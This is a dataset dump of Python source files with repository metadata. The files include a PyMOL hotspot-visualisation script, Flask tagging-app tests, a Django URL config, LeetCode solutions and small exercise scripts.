blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8df7dd01776154eb4b7f0fa22d4f39e34f89562b | 18305efd1edeb68db69880e03411df37fc83b58b | /pdb_files3000rot/fb/2fb8/tractability_500/pymol_results_file.py | 8fb6f70e459bfef541c1964fba987ec98a526281 | [] | no_license | Cradoux/hotspot_pipline | 22e604974c8e38c9ffa979092267a77c6e1dc458 | 88f7fab8611ebf67334474c6e9ea8fc5e52d27da | refs/heads/master | 2021-11-03T16:21:12.837229 | 2019-03-28T08:31:39 | 2019-03-28T08:31:39 | 170,106,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,223 | py |
from os.path import join
import tempfile
import zipfile
from pymol import cmd, finish_launching
from pymol.cgo import *
finish_launching()
dirpath = None
def cgo_arrow(atom1='pk1', atom2='pk2', radius=0.07, gap=0.0, hlength=-1, hradius=-1, color='blue red', name=''):
from chempy import cpv
radius, gap = float(radius), float(gap)
hlength, hradius = float(hlength), float(hradius)
try:
color1, color2 = color.split()
except:
color1 = color2 = color
color1 = list(cmd.get_color_tuple(color1))
color2 = list(cmd.get_color_tuple(color2))
def get_coord(v):
if not isinstance(v, str):
return v
if v.startswith('['):
return cmd.safe_list_eval(v)
return cmd.get_atom_coords(v)
xyz1 = get_coord(atom1)
xyz2 = get_coord(atom2)
normal = cpv.normalize(cpv.sub(xyz1, xyz2))
if hlength < 0:
hlength = radius * 3.0
if hradius < 0:
hradius = hlength * 0.6
if gap:
diff = cpv.scale(normal, gap)
xyz1 = cpv.sub(xyz1, diff)
xyz2 = cpv.add(xyz2, diff)
xyz3 = cpv.add(cpv.scale(normal, hlength), xyz2)
obj = [cgo.CYLINDER] + xyz1 + xyz3 + [radius] + color1 + color2 + [cgo.CONE] + xyz3 + xyz2 + [hradius, 0.0] + color2 + color2 + [1.0, 0.0]
return obj
dirpath = tempfile.mkdtemp()
zip_dir = 'out.zip'
with zipfile.ZipFile(zip_dir) as hs_zip:
hs_zip.extractall(dirpath)
cmd.load(join(dirpath,"protein.pdb"), "protein")
cmd.show("cartoon", "protein")
if dirpath:
f = join(dirpath, "label_threshold_10.mol2")
else:
f = "label_threshold_10.mol2"
cmd.load(f, 'label_threshold_10')
cmd.hide('everything', 'label_threshold_10')
cmd.label("label_threshold_10", "name")
cmd.set("label_font_id", 7)
cmd.set("label_size", -0.4)
if dirpath:
f = join(dirpath, "label_threshold_14.mol2")
else:
f = "label_threshold_14.mol2"
cmd.load(f, 'label_threshold_14')
cmd.hide('everything', 'label_threshold_14')
cmd.label("label_threshold_14", "name")
cmd.set("label_font_id", 7)
cmd.set("label_size", -0.4)
if dirpath:
f = join(dirpath, "label_threshold_17.mol2")
else:
f = "label_threshold_17.mol2"
cmd.load(f, 'label_threshold_17')
cmd.hide('everything', 'label_threshold_17')
cmd.label("label_threshold_17", "name")
cmd.set("label_font_id", 7)
cmd.set("label_size", -0.4)
colour_dict = {'acceptor':'red', 'donor':'blue', 'apolar':'yellow', 'negative':'purple', 'positive':'cyan'}
threshold_list = [10, 14, 17]
gfiles = ['donor.grd', 'apolar.grd', 'acceptor.grd']
grids = ['donor', 'apolar', 'acceptor']
num = 0
surf_transparency = 0.2
if dirpath:
gfiles = [join(dirpath, g) for g in gfiles]
for t in threshold_list:
for i in range(len(grids)):
try:
cmd.load(r'%s'%(gfiles[i]), '%s_%s'%(grids[i], str(num)))
cmd.isosurface('surface_%s_%s_%s'%(grids[i], t, num), '%s_%s'%(grids[i], num), t)
cmd.set('transparency', surf_transparency, 'surface_%s_%s_%s'%(grids[i], t, num))
cmd.color(colour_dict['%s'%(grids[i])], 'surface_%s_%s_%s'%(grids[i], t, num))
cmd.group('threshold_%s'%(t), members = 'surface_%s_%s_%s'%(grids[i],t, num))
cmd.group('threshold_%s' % (t), members='label_threshold_%s' % (t))
except:
continue
try:
cmd.group('hotspot_%s' % (num), members='threshold_%s' % (t))
except:
continue
for g in grids:
cmd.group('hotspot_%s' % (num), members='%s_%s' % (g,num))
cluster_dict = {"16.9200000763":[], "16.9200000763_arrows":[]}
cluster_dict["16.9200000763"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(-44.0), float(28.5), float(-4.5), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-44.0,28.5,-4.5], [-45.62,26.402,-4.591], color="blue red", name="Arrows_16.9200000763_1")
cluster_dict["16.9200000763"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(-44.0), float(20.0), float(-2.5), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-44.0,20.0,-2.5], [-46.141,20.536,-3.622], color="blue red", name="Arrows_16.9200000763_2")
cluster_dict["16.9200000763"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(-43.5), float(31.5), float(-3.0), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-43.5,31.5,-3.0], [-45.565,31.015,-1.188], color="blue red", name="Arrows_16.9200000763_3")
cluster_dict["16.9200000763"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(-37.0), float(24.0), float(-0.5), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-37.0,24.0,-0.5], [-35.435,21.826,0.786], color="blue red", name="Arrows_16.9200000763_4")
cluster_dict["16.9200000763"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(-34.5), float(29.0), float(-1.0), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-34.5,29.0,-1.0], [-32.426,27.812,-0.09], color="blue red", name="Arrows_16.9200000763_5")
cluster_dict["16.9200000763"] += [COLOR, 1.00, 1.000, 0.000] + [ALPHA, 0.6] + [SPHERE, float(-39.4049044046), float(27.8836362845), float(-0.685739447518), float(1.0)]
cluster_dict["16.9200000763"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(-44.5), float(23.0), float(-2.5), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-44.5,23.0,-2.5], [-47.478,23.36,-2.426], color="red blue", name="Arrows_16.9200000763_6")
cluster_dict["16.9200000763"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(-42.0), float(22.5), float(-3.5), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-42.0,22.5,-3.5], [-42.43,23.173,-6.066], color="red blue", name="Arrows_16.9200000763_7")
cluster_dict["16.9200000763"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(-40.5), float(22.5), float(0.0), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-40.5,22.5,0.0], [-38.239,21.157,0.384], color="red blue", name="Arrows_16.9200000763_8")
cluster_dict["16.9200000763"] += [COLOR, 1.00, 0.00, 0.00] + [ALPHA, 0.6] + [SPHERE, float(-36.0), float(25.5), float(0.5), float(1.0)]
cluster_dict["16.9200000763_arrows"] += cgo_arrow([-36.0,25.5,0.5], [-32.936,24.781,0.433], color="red blue", name="Arrows_16.9200000763_9")
cmd.load_cgo(cluster_dict["16.9200000763"], "Features_16.9200000763", 1)
cmd.load_cgo(cluster_dict["16.9200000763_arrows"], "Arrows_16.9200000763")
cmd.set("transparency", 0.2,"Features_16.9200000763")
cmd.group("Pharmacophore_16.9200000763", members="Features_16.9200000763")
cmd.group("Pharmacophore_16.9200000763", members="Arrows_16.9200000763")
if dirpath:
f = join(dirpath, "label_threshold_16.9200000763.mol2")
else:
f = "label_threshold_16.9200000763.mol2"
cmd.load(f, 'label_threshold_16.9200000763')
cmd.hide('everything', 'label_threshold_16.9200000763')
cmd.label("label_threshold_16.9200000763", "name")
cmd.set("label_font_id", 7)
cmd.set("label_size", -0.4)
cmd.group('Pharmacophore_16.9200000763', members= 'label_threshold_16.9200000763')
cmd.bg_color("white")
cmd.show("cartoon", "protein")
cmd.color("slate", "protein")
cmd.show("sticks", "organic")
cmd.hide("lines", "protein")
| [
"[email protected]"
] | |
ff7083adfde7388d3ad49880c60d023bb42fb506 | 637dc502d7326aaf34766c14512df10efc612516 | /tests/tagging.py | ad96eba03df498646cc4d0068da3bb5f3a49d3cf | [] | no_license | z4y4ts/unshred-tag | 085342c6ee886a8c8e9aff154ae78123e0f19833 | 08d508b964fc52c5881b11a7811cc172036247f6 | refs/heads/master | 2020-12-25T04:19:05.171352 | 2014-11-12T22:54:50 | 2014-11-12T22:54:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,124 | py | import re
from datetime import datetime
from flask import url_for
from models import Tags, User, Shreds, TaggingSpeed
from . import BasicTestCase
class TaggingTest(BasicTestCase):
def setUp(self):
self.client.post(url_for("fixtures.reset_db"))
self.client.post(url_for("fixtures.create_base_tags"))
def test_index_not_logged(self):
res = self.client.get(url_for("index"))
self.assert200(res)
body = res.get_data(as_text=True)
self.assertTrue("warm-welcome" in body)
self.assertTrue(url_for("social.auth", backend="facebook") in body)
self.assertTrue(url_for("social.auth", backend="twitter") in body)
self.assertTrue(
url_for("social.auth", backend="google-oauth2") in body)
self.assertTrue(
url_for("social.auth", backend="vk-oauth2") in body)
def test_index_logged(self):
self.create_user_and_login("user")
res = self.client.get(url_for("index"))
self.assert200(res)
body = res.get_data(as_text=True)
self.assertFalse("warm-welcome" in body)
self.assertFalse(url_for("social.auth", backend="facebook") in body)
self.assertFalse(url_for("social.auth", backend="twitter") in body)
self.assertFalse(
url_for("social.auth", backend="google-oauth2") in body)
self.assertFalse(
url_for("social.auth", backend="vk-oauth2") in body)
for tag in Tags.objects(is_base=True):
self.assertTrue(tag.title.lower() in body.lower())
self.assertTrue(tag.category.lower() in body.lower())
if tag.hotkey:
self.assertTrue(tag.hotkey in body.lower())
def test_no_more_tasks(self):
self.create_user_and_login("user")
res = self.client.get(url_for("next"))
self.assert200(res)
body = res.get_data(as_text=True)
self.assertFalse("shred_id" in body)
self.assertFalse(url_for("next") in body)
def test_has_some_tasks(self):
self.create_user_and_login("user")
self.client.post(url_for("fixtures.create_shreds"))
res = self.client.get(url_for("next"))
self.assert200(res)
body = res.get_data(as_text=True)
self.assertTrue("shred_id" in body)
self.assertTrue(url_for("next") in body)
for tag in Tags.objects(is_base=True):
self.assertTrue(
tag.title.capitalize().encode('unicode-escape') in body)
def test_user_tags_in_task(self):
self.create_user_and_login("user")
self.client.post(url_for("fixtures.create_shreds"))
user = User.objects.get(username="user")
admin = User.objects.get(username="admin")
user_tag = "foobar"
another_user_tag = "barfoo"
Tags.objects.create(title=user_tag, is_base=False,
created_by=user)
Tags.objects.create(title=another_user_tag, is_base=False,
created_by=admin)
user.tags = [user_tag]
admin.tags = [another_user_tag]
user.save()
admin.save()
res = self.client.get(url_for("next"))
self.assert200(res)
body = res.get_data(as_text=True)
self.assertTrue(
user_tag.capitalize().encode('unicode-escape') in body)
pos = body.index(user_tag.capitalize().encode('unicode-escape'))
self.assertFalse(
another_user_tag.capitalize().encode('unicode-escape') in body)
for tag in Tags.objects(is_base=True):
tag = tag.title.capitalize().encode('unicode-escape')
self.assertTrue(tag in body)
self.assertTrue(body.index(tag) < pos)
def test_tags_ordering_in_task(self):
self.create_user_and_login("user")
self.client.post(url_for("fixtures.create_shreds"))
first_tag = Tags.objects[0]
new_first_tag = Tags.objects[1]
new_first_tag.usages = 100
new_first_tag.save()
res = self.client.get(url_for("next"))
self.assert200(res)
body = res.get_data(as_text=True)
self.assertTrue(
body.index(first_tag.title.capitalize().encode('unicode-escape')) >
body.index(
new_first_tag.title.capitalize().encode('unicode-escape'))
)
def test_auto_tags(self):
self.create_user_and_login("user")
self.client.post(url_for("fixtures.create_shreds"))
tag = Tags.objects.create(title="my new tag",
synonyms=["foobar_synonym"],
is_base=True)
res = self.client.get(url_for("next"))
self.assert200(res)
body = res.get_data(as_text=True)
self.assertEquals(
body.count(tag.title.capitalize().encode('unicode-escape')), 1)
Shreds.objects.update(add_to_set__tags_suggestions=["foobar_synonym"])
res = self.client.get(url_for("next"))
self.assert200(res)
body = res.get_data(as_text=True)
self.assertEquals(
body.count(tag.title.capitalize().encode('unicode-escape')), 2)
def parse_shred_id(self, body):
pattern = r'id="shred_id".*?"([^"]*)"'
m = re.search(pattern, body)
return m.group(1)
def test_skipping(self):
self.create_user_and_login("user")
user = User.objects.get(username="user")
self.assertEqual(user.skipped, 0)
self.assertEqual(user.processed, 0)
self.client.post(url_for("fixtures.create_shreds"))
res = self.client.get(url_for("next"))
self.assert200(res)
body = res.get_data(as_text=True)
current_shred_id = first_shred_id = self.parse_shred_id(body)
for i in xrange(9):
res = self.client.post(url_for("skip"),
data={"_id": current_shred_id},
follow_redirects=True)
body = res.get_data(as_text=True)
self.assert200(res)
current_shred_id = self.parse_shred_id(body)
self.assertNotEqual(current_shred_id, first_shred_id)
self.assertEqual(
len(Shreds.objects(id=first_shred_id).first().users_skipped), 1)
res = self.client.post(url_for("skip"),
data={"_id": current_shred_id},
follow_redirects=True)
body = res.get_data(as_text=True)
self.assert200(res)
current_shred_id = self.parse_shred_id(body)
self.assertEqual(current_shred_id, first_shred_id)
self.assertEqual(
len(Shreds.objects(id=first_shred_id).first().users_skipped), 0)
user.reload()
self.assertEqual(user.skipped, 10)
self.assertEqual(user.processed, 0)
def test_valid_tagging(self):
self.create_user_and_login("user")
user = User.objects.get(username="user")
self.assertEqual(user.skipped, 0)
self.assertEqual(user.processed, 0)
self.assertEqual(user.tags_count, 0)
self.assertEqual(TaggingSpeed.objects.count(), 0)
new_tags = ["foo", "bar"]
self.client.post(url_for("fixtures.create_shreds"))
res = self.client.get(url_for("next"))
self.assert200(res)
body = res.get_data(as_text=True)
current_shred_id = self.parse_shred_id(body)
current_shred = Shreds.objects.get(id=current_shred_id)
self.assertEqual(current_shred.get_user_tags(user), None)
res = self.client.post(
url_for("next"), data={
"_id": current_shred_id,
"recognizable_chars": "foo\nbar\nfoo",
"angle": 90,
"tags": ["FOO", "foo", "Bar", "bAR"],
"tagging_start": datetime.utcnow()
})
body = res.get_data(as_text=True)
self.assert200(res)
new_shred_id = self.parse_shred_id(body)
current_shred.reload()
user.reload()
user_tag = current_shred.get_user_tags(user)
self.assertNotEqual(new_shred_id, current_shred_id)
self.assertEqual(user_tag.tags, new_tags)
self.assertEqual(user_tag.angle, 90)
self.assertEqual(user_tag.recognizable_chars, "foo\nbar\nfoo")
self.assertEqual(current_shred.users_count, 1)
self.assertEqual(current_shred.users_skipped, [])
self.assertEqual(current_shred.users_processed[0].username,
user.username)
self.assertEqual(user.skipped, 0)
self.assertEqual(user.processed, 1)
self.assertEqual(user.tags_count, 2)
self.assertEqual(user.tags, new_tags)
self.assertEqual(TaggingSpeed.objects.count(), 1)
for tag_name in new_tags:
tag = Tags.objects.get(title=tag_name)
self.assertEqual(tag.is_base, False)
self.assertEqual(tag.usages, 1)
self.assertEqual(tag.shreds[0].id, current_shred_id)
self.assertEqual(tag.created_by.username, user.username)
| [
"[email protected]"
] | |
99f52224cafb2ac12626c08b6cf0c418c1771a14 | b445dd915a74d67b988c39f525f0235e26ff7db2 | /djangoProjects/simpleBootStrapForms/src/base/urls.py | af3b4baf3553adb6bc5e1237ee342304a8a8b13c | [] | no_license | rajesh241/projects | 2a1024400151fcbdd8790a3683d909da40612719 | c6adfb7ec2f7df4880de44c50960333142569e54 | refs/heads/master | 2022-12-11T13:55:14.069601 | 2020-02-19T23:57:09 | 2020-02-19T23:57:09 | 228,992,081 | 0 | 0 | null | 2022-06-22T01:10:45 | 2019-12-19T06:42:25 | Python | UTF-8 | Python | false | false | 807 | py | """base URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from survey.views import forms_view
urlpatterns = [
path('admin/', admin.site.urls),
path('', forms_view),
]
| [
"[email protected]"
] | |
698a03e7e32842e8b104e0c82b939b34a766192e | 0306bea08e9aab18f34a799ce8a73e86921f90f7 | /medium/MergeInBetweenLinkedLists.py | 8ec144cd18dc8a581543cea87bfb41b24ae965b0 | [] | no_license | GeorgianBadita/LeetCode | 78686fde88ef65b64f84fb7c2a22ba37ef21b8d9 | e3b0571182369c5308e0c29fb87106bb0b0d615a | refs/heads/master | 2022-10-21T00:23:26.479943 | 2022-10-14T20:27:27 | 2022-10-14T20:27:27 | 251,733,951 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 801 | py | # https://leetcode.com/submissions/detail/427432636/
# Definition for singly-linked list.
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def mergeInBetween(
self, list1: ListNode, a: int, b: int, list2: ListNode
) -> ListNode:
head_a = list1
diff = b - a
while a - 1 > 0:
head_a = head_a.next
a -= 1
head_b = head_a.next
while diff > 0:
head_b = head_b.next
diff -= 1
head_b = head_b.next
final_node_list2 = list2
while final_node_list2.next != None:
final_node_list2 = final_node_list2.next
head_a.next = list2
final_node_list2.next = head_b
return list1 | [
"[email protected]"
] | |
3b0de834899f997d3899b7fac087eda59b03a816 | d8a541a2953c9729311059585bb0fca9003bd6ef | /Lists as stack ques/key_revolver (2).py | 51286e00570e0066dba3825aad1cc934c43e8eb8 | [] | no_license | grigor-stoyanov/PythonAdvanced | ef7d628d2b81ff683ed8dd47ee307c41b2276dd4 | 0a6bccc7faf1acaa01979d1e23cfee8ec29745b2 | refs/heads/main | 2023-06-10T09:58:04.790197 | 2021-07-03T02:52:20 | 2021-07-03T02:52:20 | 332,509,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 895 | py | from collections import deque
bullet_cost = int(input())
gun_barrel = int(input())
bullets = list((map(int, input().split())))
locks = deque(map(int, input().split()))
safe_value = int(input())
current_bullet = 0
while bullets and locks and gun_barrel > 0:
for bullet in range(1, gun_barrel+1):
current_bullet = bullet
shot = bullets.pop()
safe_value -= bullet_cost
if shot <= locks[0]:
print('Bang!')
locks.popleft()
if not locks or not bullets:
break
else:
print('Ping!')
if not bullets:
break
if bullets and current_bullet == gun_barrel:
current_bullet = 0
print('Reloading!')
if not locks:
print(f'{len(bullets)} bullets left. Earned ${safe_value}')
elif not bullets:
print(f'Couldn\'t get through. Locks left: {len(locks)}')
| [
"[email protected]"
] | |
80f49f9ce84cd2ecb8d31318d2a7f46c6a0b878e | 4d3118fb51c7d42d22c1f1f3bbcbaebf5f0640d2 | /exercises/coin_flip.py | 4bceb538cd7f317864e00ff6d6a62c37a3b2f534 | [] | no_license | Gabkings/python-practise | d899d3d0a4094b9b272120ad2779cbe1c043f8db | bafc1fea60dfa6b7075204276fb6e3d857be2cbf | refs/heads/master | 2020-03-25T08:30:05.917168 | 2018-08-05T13:35:44 | 2018-08-05T13:35:44 | 143,615,891 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | from random import random
def coin_flip():
face = random()
if face > 0.5:
faceup = 'head'
else:
faceup = 'tail'
return faceup
con = coin_flip()
print(con)
| [
"[email protected]"
] | |
1a21293667b3cb7e185302ffb7736a7bbe0494dd | 09ce9635b0e74ba178e98efd0d5229a25995713e | /submissions/pakencamp-2019-day3/a.py | b5e2b7089cb507bc4e2b8a16412a7f5128acf605 | [
"Unlicense"
] | permissive | m-star18/atcoder | 7575f1e1f3ee1dfa4a765493eb17b4ef0ad5f1f0 | 08e475810516602fa088f87daf1eba590b4e07cc | refs/heads/main | 2023-07-14T09:16:42.807150 | 2021-08-22T15:59:48 | 2021-08-22T15:59:48 | 364,458,316 | 1 | 0 | Unlicense | 2021-08-22T15:59:49 | 2021-05-05T04:13:03 | Python | UTF-8 | Python | false | false | 201 | py | import sys
read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10 ** 7)
a, b = map(int, readline().split())
print(b - a + 1)
| [
"[email protected]"
] | |
61122cf8d525f6b5435f3e7f4c654fba7e261694 | 714268a27bd4cc34ec053cb3d991012151554aad | /CodeChef/atTheGates.py | 1bf5f096ca7f90fe56773272969212d1e8a86d07 | [] | no_license | yashhR/competitive | 2b649011c2cea74eea8d9646bcfafc73743651eb | 37f2ec68b33828df4692bc23f28d532cb8d4a358 | refs/heads/master | 2022-11-10T04:53:47.634062 | 2020-06-22T16:43:03 | 2020-06-22T16:43:03 | 274,190,602 | 0 | 0 | null | 2020-06-22T16:36:02 | 2020-06-22T16:36:02 | null | UTF-8 | Python | false | false | 1,801 | py | '''
There is a table in front of you, with N coins placed in a row and numbered 1 through N from left to right.
For each coin, you know whether it is initially showing heads or tails. You have to perform exactly K operations.
In one operation, you should remove the rightmost coin present on the table,
and if this coin was showing heads right before it was removed, then you should also flip all the remaining coins.
(If a coin was showing heads, then after it is flipped, it is showing tails, and vice versa.)
The code needed to enter the temple is the number of coins which, after these K operations are performed,
have not been removed and are showing heads. Can you find this number? The fate of Persia lies in your hands…
Input:
The first line of the input contains a single integer T denoting the number of test cases.
The description of T test cases follows.
The first line of each test case contains two space-separated integers N and K.
The second line contains N space-separated characters.
For each valid i, the i-th of these characters is 'H' if the i-th coin is initially showing heads or 'T' if it is showing tails.
Output:
For each test case, print a single line containing one integer ― the number of coins that are showing heads after K operations.
'''
t = int(input())
def how_many():
n, m = map(int, input().split())
coins = list(input().split())
def flip():
for i in range(len(coins)):
if coins[i] == "H":
coins[i] = "T"
else:
coins[i] = "H"
for i in range(m):
if coins[-1] == "H":
flip()
coins.pop()
count = 0
for i in range(len(coins)):
if coins[i] == "H":
count += 1
return count
for i in range(t):
print(how_many())
| [
"[email protected]"
] | |
c19f605ab193cc8be99874cea988ac066ac3e0a5 | 9f414bde21046a264f3189786a7180f9ffd79d30 | /web/web/finders.py | 74784abfe14fbff5f035c0d81326851720746e80 | [
"Apache-2.0"
] | permissive | rcbops/FleetDeploymentReporting | ebd0ca07f099bdcf4e231d734145307e8f9bb9a5 | aaab76706c8268d3ff3e87c275baee9dd4714314 | refs/heads/develop | 2020-03-21T16:09:25.757015 | 2019-02-26T16:15:52 | 2019-02-26T16:15:52 | 138,753,891 | 1 | 7 | Apache-2.0 | 2019-02-26T16:15:53 | 2018-06-26T14:58:06 | Python | UTF-8 | Python | false | false | 1,311 | py | import os
from django.apps import apps
from django.contrib.staticfiles import utils
from django.contrib.staticfiles.finders import BaseFinder
from django.core.files.storage import FileSystemStorage
class AngularTemplateFinder(BaseFinder):
"""Incomplete implementation of a finder. Only implements list."""
storage_class = FileSystemStorage
source_dir = 'static'
app_name = 'web'
def __init__(self, *args, **kwargs):
"""Init the finder."""
self.storage = None
app_config = apps.get_app_config(self.app_name)
app_storage = self.storage_class(
os.path.join(app_config.path, self.source_dir)
)
if os.path.isdir(app_storage.location):
self.storage = app_storage
super().__init__(*args, **kwargs)
def list(self, ignore_patterns):
"""
List all html angular templates in the web app.
:param ignore_patterns: Collection of patterns to ignore
:type ignore_patterns: list
:yields: (path, storage object) tuple
:ytype: tuple
"""
if self.storage.exists(''):
for path in utils.get_files(self.storage, ignore_patterns):
if path.startswith('web/html') and path.endswith('.html'):
yield path, self.storage
| [
"[email protected]"
] | |
2176690dae448b8b2e6b44a37ead6da57cf654a8 | a222c577f924c390b244beaa67b4b042c2eb7337 | /bin/kt_regression.py | ffbbe2fa6643850cdc769f50a86c7be01586058e | [] | no_license | bdqnghi/sentence-ordering | 59baf539e9f30876860b73805b74862d1beef804 | fb62eea650f132ea3d01aabb831ea49531824183 | refs/heads/master | 2020-03-28T08:07:52.637593 | 2018-02-01T11:38:51 | 2018-02-01T11:38:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 711 | py |
import click
from sent_order.models import kt_regression as model
from sent_order import cuda
@click.group()
def cli():
pass
@cli.command()
@click.argument('train_path', type=click.Path())
@click.argument('model_path', type=click.Path())
@click.option('--train_skim', type=int, default=1000000)
@click.option('--lr', type=float, default=1e-3)
@click.option('--epochs', type=int, default=1000)
@click.option('--epoch_size', type=int, default=1000)
@click.option('--batch_size', type=int, default=20)
@click.option('--lstm_dim', type=int, default=500)
@click.option('--lin_dim', type=int, default=500)
def train(*args, **kwargs):
model.train(*args, **kwargs)
if __name__ == '__main__':
cli()
| [
"[email protected]"
] | |
a8340cb3c5b1eb05201fa61d09a62ab1595c6306 | f02b21d5072cb66af643a7070cf0df4401229d6e | /leetcode/explore_lessons/binary_search/first_bad_version.py | 83b3e34729656e01cef998a3a4d05972fdcfb579 | [] | no_license | dbconfession78/interview_prep | af75699f191d47be1239d7f842456c68c92b95db | 7f9572fc6e72bcd3ef1a22b08db099e1d21a1943 | refs/heads/master | 2018-10-09T22:03:55.283172 | 2018-06-23T01:18:00 | 2018-06-23T01:18:00 | 110,733,251 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,631 | py | # 278. First Bad Version
"""
You are a product manager and currently leading a team to develop a new product. Unfortunately, the latest version
of your product fails the quality check. Since each version is developed based on the previous version, all the
versions after a bad version are also bad.
Suppose you have n versions [1, 2, ..., n] and you want to find out the first bad one, which causes all the
following ones to be bad.
You are given an API bool isBadVersion(version) which will return whether version is bad. Implement a function to
find the first bad version. You should minimize the number of calls to the API.
"""
# *** when pasting into LC, remove 2nd param, bv (bad version) from method def and calls
class Solution:
# def firstBadVersion_PRACTICE(self, n, bv):
def firstBadVersion(self, n, bv):
return
def firstBadVersion_PASSED(self, n, bv):
# def firstBadVersion(self, n, bv):
left = 1
right = n
while left < right:
mid = left + (right - left) // 2
if isBadVersion(mid, bv):
right = mid
else:
left = mid + 1
return left
def isBadVersion(n, bad_version):
if n >= bad_version:
return True
else:
return False
def main():
print(Solution().firstBadVersion(2, bv=1))
print(Solution().firstBadVersion(3, bv=1))
print(Solution().firstBadVersion(4, bv=4))
print(Solution().firstBadVersion(2126753390, bv=1702766719))
# * When pasting into LC, remove 2nd param, bv (bad version) from method def and calls
if __name__ == '__main__':
main()
| [
"Hyrenkosa1"
] | Hyrenkosa1 |
74f2d8bb33061539d3c0eb9e25c12a0858c5a7ff | 71b4ab667f24a53ac1212896e4055e5bf56d5ca6 | /backend/manage.py | b65988d6aa2be9092022a1a52b487db42a73d5fc | [] | no_license | crowdbotics-apps/small-firefly-27634 | d36b283d9397b5e253013a318dcce8173575fd9d | ca990c2dc7778c47af8ddbb3945c610d91ed9681 | refs/heads/master | 2023-05-05T22:22:21.938577 | 2021-06-01T00:21:39 | 2021-06-01T00:21:39 | 372,658,277 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'small_firefly_27634.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
b422a944d1f29b3f7038e03480ecbf17ddf705f8 | 48f092fd8191b0218df8605dc7125e526764e59e | /NestedLoops/app2.py | 231571ece85b4688453d6c27e1842e5019388cf3 | [] | no_license | LalityaSawant/Python-Projects | 2edb430c094fe3d6b4e706cc61f885aa07e24dff | b142708256e26867f09b3063f5f3fffa305ec496 | refs/heads/master | 2020-05-01T03:00:26.012301 | 2019-03-23T22:09:33 | 2019-03-23T22:09:33 | 177,235,109 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 239 | py | numbers = [0,1,2,3,4,5,4,3,2,1,1,1,4,6,7,8,9,9,9,9,8,7,7,6,5,5,5,6,7,8,8,7,6,5,5,4,4,3,3,3,3,3,3,2,2,3,3]
x = 'x'
for number in numbers:
output = ''
for count in range(number):
output += '0'
print(f''' {output}''') | [
"[email protected]"
] | |
